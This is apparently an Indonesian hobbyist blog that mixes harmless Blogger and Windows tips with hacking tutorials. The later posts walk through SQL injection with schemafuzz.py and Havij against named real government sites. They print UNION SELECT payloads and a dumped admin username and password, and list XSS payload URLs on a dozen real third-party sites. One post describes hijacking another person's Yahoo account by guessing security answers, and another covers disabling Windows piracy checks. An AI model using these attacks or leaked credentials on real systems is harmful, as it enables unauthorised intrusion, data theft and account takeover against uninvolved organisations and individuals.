Membuat Readmore Menjadi Rata Kiri Kanan (Justify)

Oya, pada artikel saia yg membuat auto readmore dengan thumbails apabila telah kita simpan dan buka makan posisi hanya akan rata kiri. Bagi anda yg terbiasa menggunakan rata kiri pasti akan biasa-biasa aja, tapi berbeda apabila anda adalah tipe orang yg seneng menggunakan rata kiri dan kanan. Ok, pada artikel kali ini saia akan menjelaskan tentang cara membuat agar auto readmore yg kita buat tadi bisa menjadi rata kiri kanan (justify). 

Berikut ini langkah-langkahnya :

[1] Masuk ke dahboard > Design/Rancangan > Edit HTML. Jangan lupa centang 'Expand Widget Templates'. Download/back up file XML template terlebih dahulu agar nanti bisa mengembalikan seperti semula jika ada kesalahan.

[2] Cari script dibawah ini, cari dengan menggunakan ctrl+f :

<div expr:id='&quot;summary&quot; + data:post.id'> 

[3] Untuk membuat teks di post summary dlm readmore justify, tambahkan style css ini ke dalam tag:

style='text-align:justify;'

Jadinya:

<div style='text-align:justify;' expr:id='&quot;summary&quot; + data:post.id'>

[4] Preview terlebih dahulu, jika sudah beres, kemudian save.

Membuat Auto Read More With Thumbnails

Script auto readmore blogspot dengan thumbnails ini adalah script untuk membuat auto readmore pada template yg belum disedikannya auto readmore. Dengan penggunaan auto readmore akan membuat blog sedikit lebih ringkas, rapi dan memudahkan untuk pembaca blog memahami isi blog kita.

Langkah-langkahnya:

1. Masuk ke dahboard > Design/Rancangan > Edit HTML. Jangan lupa centang 'Expand Widget Templates'. Download/back up file XML template terlebih dahulu agar nanti bisa mengembalikan seperti semula jika ada kesalahan.
2. Copy-paste script berikut tepat DI BAWAH </head> (gunakan Ctrl+F):

<!-- Auto read more script -http://point-428.blogspot.com- Start -->
<script type='text/javascript'>
var thumbnail_mode = &quot;yes&quot;; //yes-dengan gambar,no-tanpa gambar
summary_noimg = 430;
summary_img = 340;
img_thumb_height = 150;
img_thumb_width = 150;
</script>
<script type='text/javascript'>
//<![CDATA[
function removeHtmlTag(strx,chop){
    if(strx.indexOf("<")!=-1)
    {
        var s = strx.split("<");
        for(var i=0;i<s.length;i++){
            if(s[i].indexOf(">")!=-1){
                s[i] = s[i].substring(s[i].indexOf(">")+1,s[i].length);
            }
        }
        strx =  s.join("");
    }
    chop = (chop < strx.length-1) ? chop : strx.length-2;
    while(strx.charAt(chop-1)!=' ' && strx.indexOf(' ',chop)!=-1) chop++;
    strx = strx.substring(0,chop-1);
    return strx+'...';
}
function createSummaryAndThumb(pID){
    var div = document.getElementById(pID);
    var imgtag = "";
    var img = div.getElementsByTagName("img");
    var summ = summary_noimg;
        if(thumbnail_mode == "yes") {
    if(img.length>=1) {  
        imgtag = '<span style="float:left; padding:0px 10px 5px 0px;"><img src="'+img[0].src+'" width="'+img_thumb_width+'px" height="'+img_thumb_height+'px"/></span>';
        summ = summary_img;
    }
    }
    var summary = imgtag + '<div>' + removeHtmlTag(div.innerHTML,summ) + '</div>';
    div.innerHTML = summary;
}
//]]>
</script>
<!-- Auto read more script -http://point-428.blogspot.com- End -->

Yang berwarna biru adalah jumlah dan ukuran tampilan, berikut penjelasannya :

• summary_noimg=jumlah karakter tanpa gambar, 
• summary_img=jumlah karakter dengan gambar, 
• sedangkan img_thumb_height dan 
• img_thumb_width adalah ukuran gambar (dalam pixel). Ubahlah sesuai dengan keinginan.

3.  Kemudian cari <data:post.body/> (gunakan Ctrl+F), lalu hapus dan GANTI dengan:

<!-- Auto read more -http://point-428.blogspot.com- Start -->
<b:if cond='data:blog.pageType == &quot;item&quot;'>
<data:post.body/>
<b:else/>
<b:if cond='data:blog.pageType == &quot;static_page&quot;'>
<data:post.body/>
<b:else/>
<div expr:id='&quot;summary&quot; + data:post.id'><data:post.body/></div>
<script type='text/javascript'> createSummaryAndThumb(&quot;summary<data:post.id/>&quot;);
</script>
<a class='more' expr:href='data:post.url'>Read More >></a>
</b:if>
</b:if>
<!-- Auto read more -http://point428.blogspot.com- End -->

Note : Ganti Read More >> dengan kata-kata yang anda diinginkan.

4. Tinggal kalian klik simpan deh dan rasakan perbedaannya.. :D

50 Istilah Hacking

Buat kalian yg masih belum mengerti tentang istilah-istilah hacking dalam dunia jaringan, berikut ini ada 50 istilah yang telah saia rangkum dari beberapa sumber :

1. Anonymous Condition -> Kondisi tersamar dan tidak dikenal ketika memasuki sebuah situs yang di-hack. Ada program yang hamper mirip dengan FTP, yang memiliki kelebihan bisa kalian gunakan memasuki server dengan kondisi samar, setelah itu mencuri file-file yang ada di dalamnya (jika memang server itu mengizinkan).
2. Backdoor -> Pintu belakang untuk masuk kesistem yang telah berhasil diexploitasi oleh attacker. Bertujuan untuk jalan masuk lagi kesistem korban sewaktu-waktu.
3. Back connect -> Mendapatkan koneksi balik atau mengkonekkan kompi korban kekompi kita.
4. Bind -> Membuka port pada kompi korban. Biasanya untuk tujuan backdooring. Bind umumnya disertai service-service yang langsung mengakses shell.
5. Brute force attack -> jenis serangan yang dilakukan dengan melakukan berbagai bentuk kombinasi karakter yang akan dicobakan sebagai password detil soal BFA (brute force attack).
6. Buffer over flow -> salah satu dari sekian jenis Eksploits, yang digunakan untuk menyerang salah satu titik pada server (port server) sehingga titik tersebut penuh.
7. Bug -> Kesalahan pada pemrograman yang menyebabkan system dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.
8. Box -> Banyak para  hacker yang gemar memakai istilah  Box ketika menyebut kata �Supercomputer�, �Server�, atau �PC�.
9. Crack -> Program kecil yang biasanya digunakan untuk mengakali perlindungan anti pembajakan dari sebuah piranti lunak berlisensi. Biasanya para pembajak menyertakan crack dalam paket piranti lunak yang mereka distribusikan.
10. Cookie -> Sejumlah kecil data, yang sering kali berisi pengenal unik anonim, yang dikirimkan kepada browser Anda dari komputer situs web dan disimpan pada hard drive komputer Anda.
11. Cookie stealer -> Teknik yang digunakan untuk mengambil atau mencuri cookie.
12. Debug -> kegiatan mencari bug pada aplikasi dan memperbaiki bug yg ditemukan.
13. Deface -> merubah tampilan halaman suatu website secara illegal
14. Dork -> Perintahter sembunyi dari google atau keyword yang digunakan hacker untuk mencari target.
15. DoS (Denial-of-service attacks) -> Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperole hak akses layanan dari komputer yang diserang tersebut.
16. DDOS (Distributed Denial of Service) -> serangan dgn melakukan request terus menerus pda victim dgn tujuan untk mghabiskan resource pd victim, spt bandwith, memory, dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg dilakukan secara terdistribusi atau berjamaah dlm jumlah besar, biasanya menggunakan bot pdirc.
17. Exploit -> Memanfaatkan bugs yang ditemukan untuk masuk kedalam sistem.
18. Fake Login -> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (contoh. username, password, email). Seperti pada kasus pencurian email dan password Friendster, Facebook, dll.
19. Fake Process -> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake �./backdoor� menjadi �usr/sbin/httpd�, sehingga ketika di �ps -ax�, proses �./backdoor� berubah menjadi �usr/sbin/httpd�.
20. FIRE WALL (Dinding Api) -> program yang dipakai untuk melindungi server dari �tamu-tamu� tak diundang yang memasuki file-filenya.
21. Flood -> Membanjiri target untuk tujuan target down. Flood = DoS.
22. Hashing ->Tehknik mengindeks pada manajemen database dimana nilai kunci : key (yang mengindentifikasikan record).
23. Hacker -> Sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.
24. Hacktivist -> hacker yang menggunakan teknologi untuk mengumumkan pandangan sosial, ideologi, agama atau pesan politik. Dalam kasus yang lebih ekstrim, hacktivism digunakan sebagai alat untuk Cyberterrorism.
25. Javascript injection -> Suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).
26. Jhon the Ripper Program -> Salah satu program terbaik untuk memecahkan kode rahasia (password) yang didapat oleh para hacker dari sistem operasi nix* (maksudnya Linux dan Unix).  Sistem operasi  nix*  ini -apalagi yang versi paling  anyar- berisi sistem proteksi tambahan disamping file password, artinya file password ituter-shadow (terselubung). Maka, seorang  hacker haruster lebih dahulu mendapatkan file  shadow  untuk bisa mendapatkan file password yang terselubung itu. Setelah menemukan file itu, barulah ia bisa memecahkan passwordnya. Inilah sebenarnya yang menjadi pekerjaan utama dan menurut saya merupakan langkah paling penting dalam menyerang sistem operasi.
27. Keylogger -> adalah mesin atau software yang dipasang atau diinstal dikomputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam-diam alias tidak terketahui oleh kita secara kasat mata).
28. LFI (Local File Inclusion) -> suatu bug dimana kita bisa mengincludekan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable (vulnerable LFI maksudnya).
29. Malicious Code/Script -> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.
30. Password cracking -> sebuah aplikasi yang menangkap paket data, yang dapat digunakan untuk mencuri password dan data lain dalam transit melalui beberapa jaringan.
31. Patch -> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.
32. Phising-> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.
33. Port -> menurut bahasa artinya penghubung
34. Port Scanning ->Memindai/mencari port-port yang terbuka pada suatu server.
35. RFI (Remote File Inclusion) -> penyisipan sebuah file dari luar kedalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load
36. Root -> Pengguna dengan hak tertinggi didalam, dan tidak ada batasan wewenang, dalam komputer jaringan. Istilah ini diadaptasi dari sistem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.
37. Server -> perangkat operasi sebuah situs, semua  file suatu situs terletak didalamnya. Jadi, server adalah perangkat komputer biasa, sama seperti perangkat-perangkat lain, hanya ia memiliki banyak kelebihan seperti besarnya memori dan kecepatan akses yang luar biasa. Server selalu tersambung dengan internet selama 24 jam.
38. Shell -> inti dari sistem operasi. Shell mengendalikan kerja sistem operasinya.
39. Shell account -> sebuah sistem operasi, yang dengannya kita bisa mengendalikan komputer dari jarak jauh. Tetapi komputer itu harus berbasis linux.
40. Shell interpreter -> bentuk antar muka yang merupakan penghubung antara shell dgn brainware.  Bentuk umumnya berupa console, cmd, webshell, dll.
41. Sniffing -> kegiatan ini cukup berbahaya dan sulit dielakkan
42. Super user -> sistem yang akan kita serang nanti beranggotakan beberapa user. User  yang memiliki hak total -atau hampir total- biasa disebut Super User. Super User biasanya menjadi Root, Admin, atau pemimpin sistem dalam situs.
43. SQL Injection -> salah satu jenis penyerangan yang mengijinkan user tidak sah (penyerang) untuk mengakses database server atau memasukkan (injeksi) command-command sql kedalam query sql dlm program, memanipulasi query sql dlm program.
44. TEL-NET -> program berukuran kecil yang ada disistem operasi windows. Dengan menguasai program ini, kita bisa melakukan koneksi dengan server atau operator dan melakukan aksi apapun sesuai dengan tingkat penguasaan.
45. Trojan (Horse) -> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk kedalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.
46. Virus -> Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.
47. Vurnerable ->Sistem yang memiliki bug sehingga rentan terhadap serangan.
48. Vulnerability scanner -> alat yang digunakan untuk dengan cepat mengecek komputer pada jaringan untuk diketahui kelemahan. Hacker juga biasanya menggunakan port scanner, port scanner ini adalah alat untuk melihat port pada komputer tertentu untuk mengakses komputer, dan kadang-kadang akan mendeteksi program nomor versinya, firewall melindungi komputer dari penyusup dengan membatasi akses keport.
49. Worm (Cacing) -> Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.
50. XSS -> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

Untuk sementara, cukup ini aja dulu yah. Kalo ada yg pengen nambahin, boleh langsung ditulis dikolom koment dibawah artikel ini... :)))

Melihat Tanggal Terakhir Kompi/Lepy di Format

Pernah kgak kita kebayang kira2 kpan yah terakhir kali hardisk kalian diformat.? Emank sih klo kita nyari di control panel kyakx sulit yah karena emank kgak ada tools yg disediain buat ngecek itu, tpi tunggu dulu, ternyata Windows sebenarnya menyediakan cara untuk kalian apabila kalian ingin melihat kapan terakhir kalinya anda memformat lepy/kompi anda. Begini carax :

1 : Buka CMD anda dengan cara Start => Run => lalu ketikkan CMD lalu klik Enter

2 : Klo sudah kebuka CMD kalian, ketikkan perintah berikut ini :

systeminfo|find /i "install"

3 : Liat hasilnya :

Selamet mencoba yah...

Memperpendek (Shortener) URL

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Menggabungkan File Video Menggunakan Batch Programing - Hanya Bekerja di Ekstensi flv & MPEG

Pernahkah anda kepikiran untuk menggabungkan sebuah file video yg terpisah-pisah dengan hanya menggunakan sebuah script yg sangat sederhana...??? klo belum kepikiran, kita langsung aja ke TKP...

Ini dia scriptx : copy /b *.flv FullMovie.flv

Ok, gimana cara penggunaanx, cekidot :

1) Buka notepad lalu copy dan pastekan script diatas ke notepad..

Lalu anda simpan dgn nama terserah anda, yang terpenting ekstensinya .bat. Contoh : Gabung.bat

Jgn lupa, ketika anda menyimpannya, untuk tidak lupa mengganti Text Document ke All Files..

2) Masukkan Program Gabung.bat yang anda buat tadi kedalam 1 folder bersama dengan file video yang akan digabungkan. Seperti terlihat dibawah ini :

3)  Lalu jalankan Program yang tadi kita buat dengan cara mengkliknya 2 kali & secara otomatis program kita tadi akan menjalankan perintahnya. Hasilnya akan seperti contoh dibawah ini :

Disitu terlihat ada file baru bernama FullMovie. Itulah hasil dari penggabungan semua file Video yang akan digabung tadi.


Lanjut, File yg kita gabung tadi berekstensi .flv. Kita juga bisa menggabung file yg berekstensi .MPEG dengan cara, kita cukup mengganti kata flv dengan ekstensi .MPEG. Contoh:

Exstensi .flv  = > copy /b *.flv FullMovie.flv
Exstensi .MPEG  => copy /b *.MPEG FullMovie.MPEG

Gmana, simple bgt kan...!!! Selamet mencoba yah...???

Mengganti Nama Google Menjadi Terserah Anda

Mungkin saja artikel ini sangat basi dan jadul menurut anda, tapi lumayan lah buat mengingat masa2 lalu :)

Langsung saja yah :

1) Masuk ke situs www.funnylogo.info

2) Pada baris Step 1 anda masukkan tulisan terserah anda. Contoh : X-VZiaL. Kenapa saia memakai nama ini, krena nama ini adalah nickname saia disebuah komunitas... :)

3) Pada Baris Step 2, pilih Google Style. Klo sudah tinggal anda klik Create My Search Engine

4) Dan inilah hasilnya ^^�

Yg jadi pertanyaan, bagaimana agar tulisan tersebut bisa tetap ada ketika kita membuka Mozilla..??? OK, Langsung ke TKP..

1) Copy Script yg ada di Adress Bar (liat tanda panah)

2) Klo sudah di copy, anda buka Mozilla anda lalu pilih menu Pengaturan (liat gambar dibawah ini)

3) Setelah anda klik pengaturan, anda akan dibawa kehalaman Pengaturan, anda pilih menu General (B. Indonesia : Umum), lalu copykan Script yg kita dapat dari funnylogo.info tadi kekolom Beranda, Seperti terlihat dibawah ini..

4) Lalu klik OK, selesai deh..

5) Keluar dari Mozilla anda dan buka lagi Mozilla anda, TARAAAAAM�.

Menembus Proteksi Dari Nawala Project

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Melihat Password Yang Tersimpan di Mozilla (Kloo lage Beruntung)

Pernah kepikiran kgak klo Mozilla ternyata menyimpan hasil password kita..??? Ya pastix Mozilla menyimpanx dan kebetulan ada cara sederhana neh untuk mengetahuix, itu klo kta lagi beruntung seh. Mungkin di artikelku selanjutnya, saia akan menuliskan tentang bagaimana cara membongkar tempat penyimpanan Mozilla. Oya, langsung ke TKP yah :

1) Pertama2 kita buka Mozillax dulu donk..

2) Lalu anda pilih Tools/Pengaturan, lalu klik Options (gambar dibawah)

3) Setelah mengklik options, maka anda akan dibawa ke menu Options, pilih menu Security, lalu pilih saved password

4) Hwaaa, ternyata saia beruntung, banyak username yg terjaring, lalu bagaimana kalo mau ngeliat passwordx�???

5) klo mau liat passwordx, anda tinggal klik Show Password dan �

6) TARAAAM, banyak yah, beres deh�

note : klo lg beruntungx yah� :p

Q-Whil3

No System Is Safe

Menghapus WGA Tray (Logon)

Apa kalian pernah mengalami ini..???

Wah, pasti kesel bgt yah terkena warning seperti itu..!!! Soalnya tiba2 layar kita menjadi blank dan berwarna hitam kgak jelas. Permasalahan diatas sebenarnya adalah permintaan dari MICROSOFT untuk segera meregistrasi Win**** kita. Klo Win anda asli yah tinggal reg ajah, tapi apa yg terjadi klo win kita bajakan..!!! Baiklah, anda bisa mengikuti cara2 dibawah ini :

OK, bagaimana cara menghapusnya..??? Kalian bisa mengikuti salah satu cara cara dibawah ini :

1. Masuk Regedit => klik Start lalu klik Run

Maka akan muncul kolom Search Bar seperti dibawah ini,

2. Anda tinggal ketikan Regedit lalu klik Enter / OK

Setelah itu anda akan dibawa kekolom Registry Editor yg klo menurut saya adalah jantungx Wind***, jadi berhati-hatilah dan ada baikx anda bertanya pada orang disekitar anda yg lebih mengerti dengan registry.

3. Lalu cari folder yg bernama �WGA Logon� yang terletak di KEY_LOCAL_MACHINE => Software => Microsoft => WindowsNT => CurrentVersion => WinLogon => Notify..

4. Klo anda sudah sampai difolder Notify, anda tinggal mencari folder yg bernama �WGA Logon�. Bisa dilihat dari bulatan hitam dibawah ini..

5. Apabila sudah ketemu, anda tinggal mendelete folder �WGA Logon� tsb..

6. Klo sudah anda delete, tinggal kmu restart deh, dan liat gmna hasilx..

OK, selamet mencoba & semoga berhasil yah�

Q-Whil3

No System Is Safe

Membobol Akun Yahoo Dengan Metode Tebak-tebakan

Sebenarnya artikel ini didasarkan pada sebuah cerita nyata yang terjadi dikala saia sedang bener2 kepepet. Ceritanya ialah pada suatu hari laptop saia abis mengalami kerusakan & data2 saia yg ada dilaptop saia tersebut semuanya ludes ilang entah kemana, padahal didalamnya berisi Laporan Kerja Praktek, Foto2 Penting, Laporan KRCI yg akan dikirim ke Jakarta, dll. 

Nah, pada keesokan harinya, saia lupa kalo saia harus mengirimkan Laporan Kontes Robot ke Jakarta, suer waktu itu saia pusingnya setengah mampus (cuman setengah kok) & saia teringat bahwa sebelum laptop saia rusak, saia pernah mengirimkan laporan tersebut ke email salah satu tutor robot saia dalam bentuk word, tanpa basa-basi saia hubungi tuh tutor saia, tpi blas g ada jawaban & akhirnya muncullah niat jelek saia untuk membobol tuh email tutor saia, tpi gmna caranya saia g tau & akhirnya saia mencoba metode seperti yg akan kita laksanakan berikut ini.

Kita langsung ke TKP :

1 : Kita buka yahoo terlebih dahulu, lalu klik I can't access my account seperti terlihat digambar berikut :

2 : lalu klian pilih I forgot my password, lalu klik next seperti terlihat dibawah ini :

3 : Trus isikan nama email yg akan klian eksekusi & klo sudah, jgn lupa isi kode widget yg disediakan oleh Yahoo, trus klik next deh. Liat gambar dibawah yah :

4 : Lalu klian jawab deh pertanyaan kemanan yg sudah disediakan oleh yahoo dan dipilih oleh pengguna. Makanya saia bilang ini adalah metode tebak-tebakan..

5 : Apabila jawaban anda benar, maka anda akan dibawa kepertanyaan yg kedua seperti dibawah ini..

6 : Klo semua jawaban anda benar, maka anda akan dibawa kehalaman seperti dibawah ini :

7 : Taraaaaaam, kita berhasil. Tinggal kita isikan password baru sesuai kehendak kalian sendiri & secara otomatis, e-mail tersebut akan jadi milik kalian...

8 : Inget, gunakanlah cara ini sebaik mungkin, jgn dibuat untuk tujuan yg aneh. Gunakanlah klo anda bener2 kepepet saja seperti yg saia alami..

SQL Injection Menggunakan Schemafuzz.py

Kali ini saia akan membahas tentang SQL Injection Menggunakan Schemafuzz. Sebelumnya kita sudah melakukan berbagai teknik SQL Injection, baik menggunakan cara manual ataupun menggunakan tools, tapi kali ini kita akan menggunakan sebuah script yg dibuat oleh darkcode dgn bahasa Python. Ok, saia tdk akan berbasa-basi ria lg, kita lngsng ke TKP yow :

Yg kita butuhkan adalah Program Python yg sudah terinstal dikompi/lepi anda serta Schemafuzz jga, silahkan kalian download dilink yg saia siapkan dibawah ini :

Python 27    => Link & kalian jga bisa mencarix di Google kok

Schemafuzz =>  Link & Scriptx

Klo sudah diinstal Pythonx, schemafuzz kalian masukkan kedalam folder Python di drive C..

Kalo sudah selesai, langsung kita jalankan. Caranya :

1 : Klik start >> Run >> CMD
2 : Trus kita masuk ke directory c:\ dengan mengetik CD ../.. <� mundur 2 dir
3 : masuk ke directory Python27 dengan cara ketik �cd Python27? hingga muncul C:\Python27>

4 : Jgn lupa untuk mencari targetx dulu & target yg saia ambil kali ini ialah :

http://www.ilpjitra.gov.my/newsdetails.asp?id=16

5 : Perintah dasar schemafuzzy ini yaitu :

schemafuzz.py -u �target� --perintah

6 : Pertama-tama, kita cek kolomnya dgn perintah 

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16 --findcol

Maka setelah anda menulis script diatas, akan muncul jumlah kolom seperti gambar dibawah ini :

Note : Klo script diatas tidak bisa jalan, maka tambahkanlah tanda (" ") sehingga menjadi :

schemafuzz.py -u "http://www.ilpjitra.gov.my/newsdetails.asp?id=16" --findcol

7 : Ok, sekarang kita lanjut untuk mencari DB, diatas terlihat panjang kolomx ada 10 dan pada tulisan darkcode, itulah celah yg akan kita susupi. Saia menggunakan perintah dibawah ini untuk mengekploitasinya..

schemafuzz.py -u  http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dbs

Hingga muncul hasil :

Nah kan, kita sudah temukan data base site tersebut, database ada 3 :

1. lpx8
2. mysql
3. test

tapi pada penjesalan ini kita akan gunakan database nomor 1

8 : Cari nama table dalam database lpx8 menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --schema -D lpx8

Hingga Muncul Hasil :

Keluar semua kan kolomnya. Dari sini kita mengetahui bahwa web tersebut memiliki 14 Columns. Sekarang kita tinggal pilih kolom yang akan kita exploit & saia memilih kolom terakhir yaitu tbluser

9 : Sekarang waktunya kita Exploit Tables and Columns dgn perintah dibawah ini :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T diisi Nama table -C di isi nama columns

Misal saia mau melihat data-data yang ada di columns tbluser, kita menggunakan perintah :

schemafuzz.py -u http://www.ilpjitra.gov.my/newsdetails.asp?id=16+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5,6,7,8,9 --dump -D lpx8 -T tbluser -C Username,Password

Hingga Muncul Hasil seperti di bawah ini :

Nah kan, coba lihat, keluar kan nama Username & Passwordnya :

lpadmin:shazam123 yg berarti username : lpadmin & Passwordx : shazam123, begitu juga seterusnya karena ada 3 user & pass yg berhasil kita jaring.. :)

10 : Nah user and password admin dah ketahuan, untuk login ke adminx, silahkan anda cari sendiri yah, diblog saia jga ada kok artikel yg menuliskan cara mencari letak kolom admin, 

11 : Cara ini hanya berlaku untuk sql versi 5. Untuk versi 4, Harus Manual.

Selamet mencoba & Sukseskan Dunia IT di Indonesia

Q-Whil3

XSS Again - Part II

Saia yakin klo semuanya udah tau apa itu XSS, tpi klo msih belum tau, kalian bisa membaca artikel saia tentang XSS yg sudah saia posting sebelumnya disini. Kenapa saia menulis artikel tentang XSS again, karena kebetulan saia menemukan dork XSS yg baru (bagi saia sih walaupun sebenarnya dork ini udah lama). Ok, kita langsung aj ke TKP yah...

Dork : inurl:framer.php?SUB=

1. Seperti biasa, kita cari lewat bantuan om Google...

Wao, banyak sekali web yg bisa kita eksekusi. 

2) Saia memilih salah satu website yaitu :

http://seo-evangelist.de/disallow/framer.php?data=Kontakt&opti=hm1

3) Lalu hapuslah script setelah tanda = 

4) Lalu anda ganti dgn script HTML seperti brikut ini : <font+color=red+size=8>Q-Whil3</font>

5 ) Hingga akhirnya menjadi seprti dibawah ini :

http://seo-evangelist.de/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>

6) Dan apa yg terjadi ???

BERHASIL

Berikut ini website lainnya yg berhasil saia Inject :

• http://www.visitenkarten-24.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.ustctba.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.fhrg.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.islander-magazine.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.semagix.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.gpfoundation.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.top10chart.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://ferien.hausboot-24.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.dfg-bonn.de/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
• http://www.atlhomesearch.com/framer.php?url=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg
• http://www.astutecomputing.com/demoapps/framer.php?src=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg
• http://triggerfinger.com/framer.php?p=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg

Selamet ber XSS ria :)

SQL Injection Menggunakan Tools => Havij 1.15 Vers.

Pastinya banyak sekali orang yang sudah mengerti tentang tools ini, jadi artikel ini hanya diperuntukkan bagi mereka yang belum mengerti tentang tools ini. So, yg udah ngerti siap2 kabur dari artikel ini yah, wkwkwkwk, kidding.. :)

Ok, kita langsung ke TKP yow�

1. Kita harus download dulu tools Havijnya. Sedot dimari bung => Sedoooot�

2. Klo udah didownload, langsung di Install yah�

3. Klo udah diinstal, langsung dibuka dibuka donk Havijnya� :)

4. Nah, sekarang kita cari targetnya, kalian bisa menggunakan dork2 yang sudah saya posting sebelumnya di blog ini, silakan mencari..

5. Target udah didapat, saia ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054

6. Kita masukkan target tersebut kedalam kolom target (ikuti langkah 1), trus liat dilangkah 2, terlihat kan nama databasenya, trus klo udah berhasil, klik table yg sudah saia tandai dengan nomer 3..

7. klo sudah anda klik, maka tampilannya akan seperti dibawah ini, klo sudah, anda klik lagi Get Tables, liat nih gambar dibawah..

8. Wao, banyak sekali table2 yg terbuka. Trus ayo kita tebak dimana letak admin & passx berada, saia menebak klo user n passx ada di table web_users deh. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yg terletak disebelah Get Tables yg saia tandai dgn angka 2�

9. Selanjutnya, tinggal anda centang data yg ingin anda ambil (saia tandai dgn no 1), lalu klik get data, lalu kita liat apa yg terjadi�

10. Taraaaam, keliatan kan user sama passx, tapi terenkripsi dengan md5. Gampang, tools ini kan juga menyediakan enkripsi untuk md5, silakan dishare sendiri yah�

11. Yg terpenting, tinggal anda cari sendiri deh letak kolom adminx�

Oya, tools ini selain menyediakan decrypt untuk md5, jga menyediakan cara mencari letak kolom admin loh, tpi ntara saia posting di artikel selanjutnya� :) dadah..!!!

Mencari Letak Kolom Admin Menggunakan Admin Finder

Ketika kita melakukan penetrasi sebuah website dan berhasil mendapatkan username serta password target sasaran kita, hal yg kadang2 menganjal ialah kita masih belum tahu letak kolom admin web target sasaran kita. Cara ini mungkin bisa sedikit membantu anda untuk mencari letak kolom admin tsb & cara ini jga bisa digunakan ketika anda lupa dimana letak kolom admin milik anda (buat orang2 yg pelupa seperti saia). Langsung saja ke TKP, cekidot :

Sebentar, sebelum ke TKP, klian harus mendownload dulu file dibawah ini :P

Pertama, Karena kita menggunakan bahasa Perl, maka anda harus menginstall Perl terlebih dahulu dilepy anda. Anda bisa mencarinya di google atau anda bisa download melalui link berikut ini => Link 1 & Link 2

Kedua, Download-lah file berikut ini => Admin Finder.pl

Atau boleh juga disini => Admin Finder.pl

Ok semua, Kalo sudah, ikuti cara penggunaanx berikut ini :

1. Install Perl terlebih dahulu

2. File admin.pl yg sudah anda download, taruhlah di drive C

3. Jalankan cmd dgn cara Start � Run � CMD

4. Anda akan dibawa kehalaman Command Prompt, lalu anda ketikkan cd\

5. Kemudian ketik: admin.pl lalu enter. Maka anda akan dibawa kehalaman seperti dibawah ini

6. Lalu kita masukkan alamat target. Contoh : www.uni****.ac.id 

7. Kita akan dihadapkan oleh pilihan bahasa, untuk itu kita cukup menulis any

8. Proses pencarian-pun akan dilakukan..

Dan Taraaaaam, keliatan kan letak kolom adminnya.. Selamat mencoba yaah & selalu sukseskan dunia IT di Indonesia�